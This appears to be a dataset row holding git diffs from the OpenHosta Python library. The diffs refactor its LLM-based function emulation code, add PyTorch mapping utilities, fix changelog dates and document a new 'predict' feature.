- + f"{key}\n"
- + "Here's the arguments:\n"
- + f"{args}\n"
- )
-
- response = l_default.api_call(
- sys_prompt=_thought_sys_prompt,
- user_prompt=l_user_prompt,
- creativity=0.5,
- diversity=0.5,
- )
-
- data = response.json()
- type_json = data["choices"][0]["message"]["content"]
- type_dict = json.loads(type_json)
- type_str = str(type_dict["type"])
-
- _function_infos["return_caller"] = locate(type_str)
- setattr(inner_func, "_return_type", _function_infos["return_caller"])
-
- new_model = create_model(
- "Hosta_return_shema",
- return_hosta_type=(_function_infos["return_caller"], ...),
- )
- _function_infos["return_type"] = new_model.model_json_schema()
-
- typed = (
- str(args)
- + "\n"
- + 'Here\'s the return type that must respect for your response. The python type is in the key "type" of this JSON schema:\n'
- + str(type_dict)
- + "\n"
- )
-
- try:
- _function_infos["function_def"] = key
- _function_infos["function_call"] = typed
- result = _exec_emulate(_function_infos, inner_func)
- except Exception as e:
- sys.stderr.write(f"{e}")
- sys.stderr.write("[LMDA_ERROR]")
- result = None
- return result
-
- return inner_func
-
\ No newline at end of file
diff --git a/src/OpenHosta/trainset.py b/src/OpenHosta/trainset.py
deleted file mode 100644
index c2b1cfc..0000000
--- a/src/OpenHosta/trainset.py
+++ /dev/null
@@ -1,59 +0,0 @@
-import inspect
-
-from .cache import Hostacache
-from .example import type_verificator
-from .config import DefaultManager
-from .predict import load_cache
-
-l_default = DefaultManager.get_default_model()
-
-class TrainingSet():
- def __init__(self, func : callable):
- assert callable(func), "Please provide an hosta-injected function"
- self.func = func
- self.infos_cache = None
-
- def visualize(self):
- """
- function for visualize the training set idk how for now
- maybe let the hostashpère do it
- """
- hosta_cache = load_cache(self.func)
- print("ho_example:")
- for i in range(len(hosta_cache["ho_example"])):
- print(hosta_cache["ho_example"][i])
- print("ho_data:")
- for i in range(len(hosta_cache["ho_data"])):
- print(hosta_cache["ho_data"][i])
- return [hosta_cache["ho_example"], hosta_cache["ho_data"]]
-
- def add(self, *args, hosta_out=None,**kwargs):
- """
- function for add an example to the training set
- """
- input_type = {}
- output_type = {}
- data_dict = {}
- hosta_func = self.func
-
- if hosta_out is None:
- raise ValueError("Please provide hosta_out for output.")
- if hosta_func is None:
- raise ValueError("Please provide hosta_func for specifying the function")
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError("Please provide hosta_func for specifying the function")
-
- try:
- sig = inspect.signature(func)
- for param in sig.parameters.values():
- input_type[param.name] = param.annotation
- output_type["hosta_out"] = sig.return_annotation
- except:
- raise ValueError("Function does not have a signature")
-
- type_verificator(args, kwargs, input_type, output_type, hosta_out, func, data_dict)
- cache_id = "ho_data"
- cache = Hostacache(func, cache_id, data_dict)
- cache.create_hosta_cache()
diff --git a/src/OpenHosta/utils/__init__.py b/src/OpenHosta/utils/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/errors.py b/src/OpenHosta/utils/errors.py
similarity index 58%
rename from src/OpenHosta/errors.py
rename to src/OpenHosta/utils/errors.py
index 92bd1ff..8820269 100644
--- a/src/OpenHosta/errors.py
+++ b/src/OpenHosta/utils/errors.py
@@ -1,29 +1,44 @@
+from __future__ import annotations
+
from typing import Literal
__all__ = (
"RequestError",
"ApiKeyError",
- "FrameError"
+ "FrameError",
+ "InvalidStructureError"
)
OhErrorCodes = Literal[
""
]
+
class OhErrorMixin(Exception):
""" Base class for other customs exceptions """
- def __init__(self, message:str):
+
+ def __init__(self, message: str):
super().__init__(message)
self.message = message
-
- def __str__(self)->str:
+
+ def __str__(self) -> str:
return f"{self.message}\n"
-
+
+
class RequestError(OhErrorMixin):
""" Raised when a request to a llm went wrong """
+
class ApiKeyError(RequestError):
""" Raised when API key is missing or incorrect """
+
class FrameError(OhErrorMixin):
- """ Raised when the frame inspection fail """
\ No newline at end of file
+ """ Raised when the frame inspection fail """
+
+
+class InvalidStructureError(OhErrorMixin):
+ """ Raised when the bosy's function aren't placed correctly """
+
+
+# création d'agent + multimodal + tools
diff --git a/src/OpenHosta/utils/hosta_type.py b/src/OpenHosta/utils/hosta_type.py
new file mode 100644
index 0000000..87b9874
--- /dev/null
+++ b/src/OpenHosta/utils/hosta_type.py
@@ -0,0 +1,28 @@
+from __future__ import annotations
+
+from dataclasses import dataclass
+from typing import Any, Literal, Union, TypedDict
+
+
+class ExampleType(TypedDict):
+ in_: Any
+ out: Any
+
+
+class CotType(TypedDict):
+ task: str
+
+
+class UseType(TypedDict):
+ pass
+
+
+MemKey = Literal["ex", "cot", "use"]
+MemValue = Union[CotType, ExampleType, UseType]
+
+
+@dataclass
+class MemoryNode:
+ key: MemKey
+ id: int
+ value: MemValue
diff --git a/src/OpenHosta/utils/import_handler.py b/src/OpenHosta/utils/import_handler.py
new file mode 100644
index 0000000..6694f2b
--- /dev/null
+++ b/src/OpenHosta/utils/import_handler.py
@@ -0,0 +1,13 @@
+from __future__ import annotations
+
+all = (
+ "is_pydantic"
+ "is_torch"
+)
+
+is_pydantic = False
+try:
+ import pydantic
+ is_pydantic = True
+except ImportError:
+ is_pydantic = False
diff --git a/src/OpenHosta/utils/meta_prompt.py b/src/OpenHosta/utils/meta_prompt.py
new file mode 100644
index 0000000..7791ca0
--- /dev/null
+++ b/src/OpenHosta/utils/meta_prompt.py
@@ -0,0 +1,73 @@
+from __future__ import annotations
+
+from typing import List, Callable
+
+def print_last_prompt(func:Callable):
+ if hasattr(func, "_last_request"):
+ if "sys_prompt" in func._last_request:
+ print("[SYSTEM PROMPT]")
+ print(func._last_request["sys_prompt"])
+ if "user_prompt" in func._last_request:
+ print("[USER PROMPT]")
+ print(func._last_request["user_prompt"])
+ else:
+ print("No prompt found for this function.")
+
+class MetaPrompt:
+
+ def __init__(self, shards: List[str]):
+ for shard in shards:
+ if not isinstance(shard, str):
+ raise ValueError(
+ "[MetaPrompt.__init__] Shards must be strings.")
+ try:
+ setattr(self, "_{}".format(shard.upper()), "")
+ except:
+ raise AttributeError(
+ f"[MetaPrompt.__init__] Failed to initialize {shard} attributs")
+
+ def __repr__(self):
+ ctx = {}
+ for key, value in self.__dict__.items():
+ if key.startswith("CTX_"):
+ ctx[key] = value
+ return "\n".join(ctx.values())
+
+
+EMULATE_PROMPT = MetaPrompt([
+ "CTX_MAIN",
+ "CTX_SEP1"
+ "CTX_EXAMPLE",
+ "CTX_SEP2"
+ "PRE_DEF",
+ "PRE_TYPE",
+ "PRE_SCHEMA",
+ "PRE_LOCALS",
+ "PRE_SELF",
+ "PRE_EXAMPLE",
+ "PRE_COT",
+ "USER_SEP"
+])
+EMULATE_PROMPT.CTX_MAIN = "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function." # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_SEP1 = "\n---\n" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_EXAMPLE = "## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\"value\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_SEP2 = "\n---\n\n## Function infos\n" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_DEF = "Here's the function definition:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_TYPE = "Here's the type annotation of the function:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_SCHEMA = "If it isn't a native type, here's a schema describing the type annotation:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_LOCALS = "Here's the function's locals variables which you can use as additional information to give your answer:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_SELF = "Here's the method's class attributs variables which you can use as additional information to give your answer:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_EXAMPLE = "Here are some examples of expected input and output:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_COT = "To solve the request, you have to follow theses intermediate steps. Give only the final result, don't give the result of theses intermediate steps:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.USER_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
+
+THOUGHT_PROMPT = MetaPrompt([
+ "CTX_MAIN",
+ "CXT_SEP",
+ "CTX_EXAMPLE",
+ "USER_SEP"
+])
+THOUGHT_PROMPT.CTX_PROMPT = "You will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function behavior as a sentence, and the argument passed to the function.\n\nYour objective is to find the Python data type to be returned by the function. Take into account the function's behavior, the wording and intent of the sentence, and the arguments given. You must give your answer without any comment and in the following JSON schema:\n```\n{\"type\": \"\"}\n```\n\nTo fill in the type key, you need to follow Python syntax, such as \"int\" or \"str\", depending on your answer." # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.CTX_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.CTX_EXAMPLE = "Here are a few examples:\n\nFunction behavior: \"Is a positive number\"\nArgument: 2\nExpected response: {\"type\": \"bool\"}\n\nFunction behavior: \"Multiply a number by 2\"\nArgument: 10\nExpected response: {\"type\": \"int\"}\n\nFunction behavior: \"Reverse a string\"\nArgument: \"Hello World!\"\nExpected response: {\"type\": \"str\"}\n\nFunction behavior: \"Sorts a list in ascending order\"\nArgument: (10, 5, 7, 12, 3)\nExpected response: {\"type\": \"list\"}" # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.USER_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
diff --git a/src/OpenHosta/utils/progress_bar.py b/src/OpenHosta/utils/progress_bar.py
new file mode 100644
index 0000000..b5e3f96
--- /dev/null
+++ b/src/OpenHosta/utils/progress_bar.py
@@ -0,0 +1,22 @@
+
+def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=25, fill='-', print_end="\r"):
+ """
+ Call in a loop to create terminal progress bar
+ @params:
+ iteration - Required : current iteration (Int)
+ total - Required : total iterations (Int)
+ prefix - Optional : prefix string (Str)
+ suffix - Optional : suffix string (Str)
+ decimals - Optional : positive number of decimals in percent complete (Int)
+ length - Optional : character length of bar (Int)
+ fill - Optional : bar fill character (Str)
+ print_end - Optional : end character (e.g. "\r", "\r\n") (Str)
+ """
+ percent = ("{0:." + str(decimals) + "f}").format(100 *
+ (iteration / float(total)))
+ filled_length = int(length * iteration // total)
+ bar = fill * filled_length + '-' * (length - filled_length)
+ print(f'\r{prefix} {bar} {percent}% {suffix}', end=print_end)
+ # Print New Line on Complete
+ if iteration == total:
+ print()
diff --git a/src/OpenHosta/prompt.json b/src/OpenHosta/utils/prompt.json
similarity index 85%
rename from src/OpenHosta/prompt.json
rename to src/OpenHosta/utils/prompt.json
index 9e752fd..fdfe2ce 100644
--- a/src/OpenHosta/prompt.json
+++ b/src/OpenHosta/utils/prompt.json
@@ -20,9 +20,21 @@
},
{
"key": "emulate",
- "text": "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function.\n\n---\n\n## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\\\"value\\\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}\n",
+ "text": "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function.\n\n---\n\n## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\"value\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}\n",
"category": "executive",
"version": "v1.2"
+ },
+ {
+ "key": "synthetic_data_generator",
+ "text": "{func_name}{signature}:\n \"\"\"{docstring}\"\"\"\n\nIMPORTANT RULES:\n1. Input values should respect the type hints\n2. Output values MUST be diverse - avoid generating the same output repeatedly\n3. Each row must be in CSV format\n4. For text outputs, enclose them in double quotes\n5. NO MORE THAN 20% of outputs should be the same value\n6. Generate inputs across the entire possible range\n7. Ensure proper formatting for {return_type} output type",
+ "category": "executive",
+ "version": "v1.0"
+ },
+ {
+ "key": "synthetic_data_generator",
+ "text": "{func_name}{signature}:\n \"\"\"{docstring}\"\"\"\n\nIMPORTANT RULES:\n1. Input values should respect the type hints\n2. Output values MUST be diverse - avoid generating the same output repeatedly\n3. Each row must be in CSV format\n4. For text outputs, enclose them in double quotes\n5. NO MORE THAN 20% of outputs should be the same value\n6. Generate inputs across the entire possible range\n7. Ensure proper formatting for {return_type} output type",
+ "category": "executive",
+ "version": ""
}
]
}
\ No newline at end of file
diff --git a/src/OpenHosta/utils/torch_nn_utils.py b/src/OpenHosta/utils/torch_nn_utils.py
new file mode 100644
index 0000000..0763130
--- /dev/null
+++ b/src/OpenHosta/utils/torch_nn_utils.py
@@ -0,0 +1,272 @@
+from typing import Union
+
+from torch import nn
+from torch import optim
+
+from ..exec.predict.model.neural_network_types import LayerType, LossFunction, OptimizerAlgorithm, Layer
+
+
+def pytorch_layer_to_custom(layer) -> Layer:
+ """
+ Maps a PyTorch layer instance to a custom Layer representation.
+
+ :param layer: PyTorch layer object.
+ :return: A custom Layer object representing the PyTorch layer.
+ """
+ if isinstance(layer, nn.Linear):
+ return Layer(
+ layer_type=LayerType.LINEAR,
+ in_features=layer.in_features,
+ out_features=layer.out_features,
+ )
+
+ elif isinstance(layer, nn.Conv2d):
+ return Layer(
+ layer_type=LayerType.CONV2D,
+ in_features=layer.in_channels,
+ out_features=layer.out_channels,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.Dropout):
+ return Layer(
+ layer_type=LayerType.DROPOUT,
+ dropout=layer.p # Dropout rate
+ )
+
+ elif isinstance(layer, nn.ReLU):
+ return Layer(
+ layer_type=LayerType.RELU
+ )
+
+ elif isinstance(layer, nn.BatchNorm1d):
+ return Layer(
+ layer_type=LayerType.BATCHNORM1D,
+ out_features=layer.num_features
+ )
+
+ elif isinstance(layer, nn.BatchNorm2d):
+ return Layer(
+ layer_type=LayerType.BATCHNORM2D,
+ out_features=layer.num_features
+ )
+
+ elif isinstance(layer, nn.MaxPool2d):
+ return Layer(
+ layer_type=LayerType.MAXPOOL2D,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.AvgPool2d):
+ return Layer(
+ layer_type=LayerType.AVGPOOL2D,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.Sigmoid):
+ return Layer(
+ layer_type=LayerType.SIGMOID
+ )
+
+ elif isinstance(layer, nn.Softmax):
+ return Layer(
+ layer_type=LayerType.SOFTMAX
+ )
+
+ elif isinstance(layer, nn.Tanh):
+ return Layer(
+ layer_type=LayerType.TANH
+ )
+
+ else:
+ raise ValueError(f"Unsupported PyTorch layer type: {layer.__class__.__name__}")
+
+
+def custom_layer_to_pytorch(layer: Layer) -> Union[nn.Module, None]:
+ """
+ Maps a custom Layer instance to a PyTorch layer.
+
+ :param layer: The custom Layer instance.
+ :return: The PyTorch layer instance.
+ """
+ if layer.layer_type == LayerType.LINEAR:
+ return nn.Linear(layer.in_features, layer.out_features)
+
+ elif layer.layer_type == LayerType.CONV2D:
+ return nn.Conv2d(
+ in_channels=layer.in_features,
+ out_channels=layer.out_features,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.DROPOUT:
+ return nn.Dropout(p=layer.dropout)
+
+ elif layer.layer_type == LayerType.RELU:
+ return nn.ReLU()
+
+ elif layer.layer_type == LayerType.BATCHNORM1D:
+ return nn.BatchNorm1d(num_features=layer.out_features)
+
+ elif layer.layer_type == LayerType.BATCHNORM2D:
+ return nn.BatchNorm2d(num_features=layer.out_features)
+
+ elif layer.layer_type == LayerType.MAXPOOL2D:
+ return nn.MaxPool2d(
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.AVGPOOL2D:
+ return nn.AvgPool2d(
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.SIGMOID:
+ return nn.Sigmoid()
+
+ elif layer.layer_type == LayerType.SOFTMAX:
+ return nn.Softmax()
+
+ elif layer.layer_type == LayerType.TANH:
+ return nn.Tanh()
+
+ else:
+ return None
+
+
+_LOSS_FUNC_MAP = {
+ nn.L1Loss: LossFunction.L1_LOSS,
+ nn.MSELoss: LossFunction.MSE_LOSS,
+ nn.CrossEntropyLoss: LossFunction.CROSS_ENTROPY_LOSS,
+ nn.CTCLoss: LossFunction.CTC_LOSS,
+ nn.NLLLoss: LossFunction.NLL_LOSS,
+ nn.PoissonNLLLoss: LossFunction.POISSON_NLL_LOSS,
+ nn.GaussianNLLLoss: LossFunction.GAUSSIAN_NLL_LOSS,
+ nn.KLDivLoss: LossFunction.KL_DIV_LOSS,
+ nn.BCELoss: LossFunction.BCE_LOSS,
+ nn.BCEWithLogitsLoss: LossFunction.BCE_WITH_LOGITS_LOSS,
+ nn.MarginRankingLoss: LossFunction.MARGIN_RANKING_LOSS,
+ nn.HingeEmbeddingLoss: LossFunction.HINGE_EMBEDDING_LOSS,
+ nn.HuberLoss: LossFunction.HUBER_LOSS,
+ nn.SmoothL1Loss: LossFunction.SMOOTH_L1_LOSS,
+ nn.CosineEmbeddingLoss: LossFunction.COSINE_EMBEDDING_LOSS,
+ nn.MultiLabelSoftMarginLoss: LossFunction.MULTI_LABEL_SOFT_MARGIN_LOSS,
+ nn.TripletMarginLoss: LossFunction.TRIPLET_MARGIN_LOSS,
+ nn.MultiMarginLoss: LossFunction.MULTI_MARGIN_LOSS,
+ nn.SoftMarginLoss: LossFunction.SOFT_MARGIN_LOSS,
+ nn.MultiLabelMarginLoss: LossFunction.MULTI_LABEL_MARGIN_LOSS,
+ nn.TripletMarginWithDistanceLoss: LossFunction.TRIPLET_MARGIN_WITH_DISTANCE_LOSS,
+}
+
+
+def pytorch_loss_to_custom(loss_instance) -> LossFunction:
+ """
+ Maps a PyTorch loss function instance to a custom LossFunction enum.
+
+ :param loss_instance: PyTorch loss function object.
+ :return: The custom LossFunction enum.
+ """
+
+ loss_type = type(loss_instance)
+ if loss_type in _LOSS_FUNC_MAP:
+ return _LOSS_FUNC_MAP[loss_type]
+ raise ValueError(f"Unsupported PyTorch loss function: {loss_type.__name__}")
+
+def custom_loss_to_pytorch(loss_function: LossFunction) -> Union[nn.Module, None]:
+ """
+ Maps a custom LossFunction enum to a PyTorch loss function.
+
+ :param loss_function: The custom LossFunction enum.
+ :return: The PyTorch loss function instance.
+ """
+
+ if loss_function in _LOSS_FUNC_MAP:
+ return _LOSS_FUNC_MAP[loss_function]
+ return None
+
+
+_OPTIMIZER_MAP = {
+ optim.Adadelta: OptimizerAlgorithm.ADADELTA,
+ optim.Adagrad: OptimizerAlgorithm.ADAGRAD,
+ optim.Adam: OptimizerAlgorithm.ADAM,
+ optim.AdamW: OptimizerAlgorithm.ADAMW,
+ optim.Adamax: OptimizerAlgorithm.ADAMAX,
+ optim.SparseAdam: OptimizerAlgorithm.SPARSEADAM,
+ optim.ASGD: OptimizerAlgorithm.ASGD,
+ optim.RMSprop: OptimizerAlgorithm.RMSPROP,
+ optim.Rprop: OptimizerAlgorithm.RPROP,
+ optim.SGD: OptimizerAlgorithm.SGD,
+ optim.LBFGS: OptimizerAlgorithm.LBFGS,
+ optim.NAdam: OptimizerAlgorithm.NADAM,
+ optim.RAdam: OptimizerAlgorithm.RADAM,
+}
+
+def pytorch_optimizer_to_custom(optimizer_instance) -> OptimizerAlgorithm:
+ """
+ Maps a PyTorch optimizer instance to a custom OptimizerAlgorithm enum.
+
+ :param optimizer_instance: PyTorch optimizer.
+ :return: The custom OptimizerAlgorithm enum.
+ """
+
+ optimizer_type = type(optimizer_instance)
+ if optimizer_type in _OPTIMIZER_MAP:
+ return _OPTIMIZER_MAP[optimizer_type]
+ raise ValueError(f"Unsupported PyTorch optimizer: {optimizer_type.__name__}")
+
+
+def custom_optimizer_to_pytorch(optimizer_algorithm: OptimizerAlgorithm, model: nn.Module, **kwargs) -> Union[optim.Optimizer, None]:
+ """
+ Maps a custom OptimizerAlgorithm enum to a PyTorch optimizer.
+
+ :param optimizer_algorithm: The custom OptimizerAlgorithm enum.
+ :param model: The PyTorch model.
+ :return: The PyTorch optimizer instance.
+ """
+
+ if optimizer_algorithm in _OPTIMIZER_MAP:
+ return _OPTIMIZER_MAP[optimizer_algorithm](model.parameters(), **kwargs)
+ return None
+
+def type_size(data, tokens_size=10):
+ """
+ Calculate the _inputs/_outputs size based on the type of the _inputs data.
+
+ Parameters:
+ data: Can be of type int, float, list, tuple, numpy array, PyTorch tensor, set, dict, or string.
+
+ Returns:
+ The size (number of elements) of the given data.
+ """
+ if data is str:
+ return tokens_size
+ elif data is int:
+ return 1
+ elif data is float:
+ return 1
+ elif data is bool:
+ return 1
+ elif data is list:
+ return len(data) * type_size(data[0]) if data else 0
+ elif data is tuple:
+ return sum(type_size(item) for item in data)
+ elif data is set:
+ return sum(type_size(item) for item in data)
+ elif data is dict:
+ return sum(type_size(k) + type_size(v) for k, v in data.items())
+ # elif isinstance(data, typing._GenericAlias) and get_origin(data) is Literal:
+ # return len(data.__args__)
+ else:
+ raise TypeError(f'Unsupported data type: {type(data)}')
| Refacto ebatt fix
Hello Merlin,
Voici mes propositions de modification pour la beta.
Je te laisse décider si tu les intègres en l'état dans la RC ou si tu veux changer des détails.
Emmanuel
| 2024-11-15T07:52:04 | 0.0 | [] | [] |
|||
hand-e-fr/OpenHosta | hand-e-fr__OpenHosta-136 | 154e2585651ab14822ccde6812248dad256c49f4 | diff --git a/CHAGELOG.md b/CHANGELOG.md
similarity index 81%
rename from CHAGELOG.md
rename to CHANGELOG.md
index e7ff99e..054c21a 100644
--- a/CHAGELOG.md
+++ b/CHANGELOG.md
@@ -2,8 +2,34 @@
All significant changes to this project will be documented in this file.
+## **v1.2rc-1 10/10/2024**
+
+### **New Features**
+
+1. **TrainingSet Management**
+ Manage training datasets effortlessly with new tools:
+ - **`.visualize`**: Inspect current data visually.
+ - **`.add`**: Add new examples.
+
+2. **Enhanced `predict` Attributes**
+ New functionalities for `predict`:
+ - **`.retrain`**: Retrain models with specified parameters.
+ - **`.continue_train`**: Continue training with existing weights.
+ - **`.emulate`**: Run predictions through an LLM.
+
+### **Enhancements**
+
+- **Expanded Dataset Support**: `load_training_example` (*previously `load_examples`*) supports JSON, JSONL, and CSV formats for easier integration.
+
+- **Verbose Mode in `predict`**: Track detailed model training and set target losses with **get_loss**.
+
+### **Fixes**
+
+- **CUDA Compatibility**: `predict` now works with CUDA-enabled GPUs (device ID selection pending).
+
---
+
## **v1.1.1** 10/07/24
- **Features**
@@ -23,7 +49,7 @@ All significant changes to this project will be documented in this file.
- Re-added `diagramm` attributs but decrepated
- Added explicitly a neutral response in the `emulate` prompt (None)
-## **v1.1-rc4** 27/09/24
+## **v1.1-rc4** 09/27/24
- **Feature**
- Added `suggest` function. Works the same as the `__suggest__` attributs but in a function
@@ -37,7 +63,7 @@ All significant changes to this project will be documented in this file.
- **Fixes**
- `suggest` attribute `diagramm` is now `diagram`
-## **v1.1-rc3** 26/09/23
+## **v1.1-rc3** 09/26/23
- **Fixes**
- `emulate` now works when emulated function is called inside another one
@@ -49,7 +75,7 @@ All significant changes to this project will be documented in this file.
- Added a Makefile for cleaning and packaging and tests
---
-## **v1.1** 13/09/2024
+## **v1.1** 09/13/2024
- **Fixes**
- the `emulate` function is now decorator-resistant.
@@ -89,7 +115,7 @@ All significant changes to this project will be documented in this file.
---
-## **v1.0** 29/08/2024:
+## **v1.0** 08/29/2024:
- **Features**
- Function *emulate* to emulate a function by LLM.
diff --git a/README.md b/README.md
index 6a574ac..7ef22dd 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v1.1.2 - Open-Source Project
+v1.2.0 - Opensource Project
**- The future of development is human -**
diff --git a/doc/Docs.md b/doc/Docs.md
index f3d45da..d23a425 100644
--- a/doc/Docs.md
+++ b/doc/Docs.md
@@ -1,7 +1,7 @@
# Documentation
___
-Documentation for version: **1.1.2**
+Documentation for version: **1.2.0
Welcome to **OpenHosta** documentation :). Here you'll find all the **explanations** you need to understand the library, as well as **usage examples** and advanced **configuration** methods for the most complex tasks. You'll also find explanations of the source code for those interested in **contributing** to this project. Check the [Google Colab](https://colab.research.google.com/drive/1XKrPrhLlYJD-ULTA8WHzIMqTXkb3iIpb?usp=sharing) **test files** to help you take your first steps in discovering OpenHosta.
@@ -79,6 +79,10 @@ Let's **get started**! First here's the **table of contents** to help you naviga
- ["suggest" Function](#suggest-function)
- [Usage](#usage)
- [Output Examples](#output-examples)
+ - ["predict" Function](#predict-function)
+ - [Parameters](#predict-function-parameters)
+ - [Additional fonctionalities](#additional-predict-functionalities)
+ - [Output setting](#training-output)
- ["thought" Function](#thought-function)
- ["example" Function](#example-function)
- [Advanced configuration](#advanced-configuration)
@@ -163,7 +167,7 @@ Note that some features like `thought` or `__suggest__` specifically use the def
config.set_default_model(my_model)
```
-### "emulate" Function
+## `emulate` Function
The *emulate* function is the main feature of OpenHosta. This is the function that allows you to emulate functions with AI, i.e. the instructions will be executed in an LLM and not directly in your computer. Here's how to use it.
@@ -306,6 +310,10 @@ You can also retrieve the entire LLM response by storing the output of the `sugg
Note that this feature uses the default model.
+You can also retrieve the entire LLM response by storing the output of the `suggest` function.
+
+Note that this feature uses the default model.
+
#### Output Examples
- **Enhanced prompt:**
@@ -328,7 +336,163 @@ graph LR
I --> J[End]
```
-### "thought" Function
+
+---
+
+## `predict` Function
+
+The `predict` function is the second major feature of OpenHosta, designed to enable the dynamic creation of models for specific functions. While it shares similarities with the `emulate` function, instead of making API calls to a large language model (LLM), `predict` generates an internal model—currently supporting only linear regression.
+
+### How `predict` Works
+
+The `predict` function allows users to train a model automatically by providing a set of training examples. It simplifies model-building by handling the training process directly within a Python function.
+
+At this time, `predict` has a few **limitations** to be aware of:
+
+- **Supported Input Types**: Only `int` and `float` types are allowed as inputs.
+- **Return Type**: The function returns output as a `float`.
+- **Model Type**: Currently, the function builds a simple linear regression model with a single output.
+- **Training Examples**: You must provide at least one example for the model to be trained correctly.
+
+### Limitations and Known Issues
+
+- Since `predict` is still in its Release Candidate (RC) phase, some instability and bugs might occur.
+- If you encounter any issues, please help improve the functionality by reporting them :)
+---
+
+
+- *Below is a practical example demonstrating how to use `predict` to build a model that estimates a person's chance of dying based on their age*:
+
+```python
+from OpenHosta import predict, example
+
+def find_chance_of_die(age: float) -> float:
+ """
+ This function predicts the chance of dying in a percentage value from 0 to 1,
+ based on the age (with the baseline year starting at 1900).
+ """
+ # We forced some interpolation not real data
+ example(age=124.0, hosta_out=0.99)
+ example(age=100.5, hosta_out=0.20)
+ example(age=55.0, hosta_out=0.60)
+ example(age=45.0, hosta_out=0.10)
+ example(age=24.8, hosta_out=0.20)
+ example(age=8.0, hosta_out=0.01)
+ return predict()
+
+x = find_chance_of_die(124.0)
+print(x)
+```
+For `example` documentation, please go to this [link](#example-function)
+
+### `predict` Function Parameters
+
+The `predict` function includes several parameters that allow you to fine-tune the model's behavior. Below is a list of these parameters:
+
+- **`epochs` (int)**:
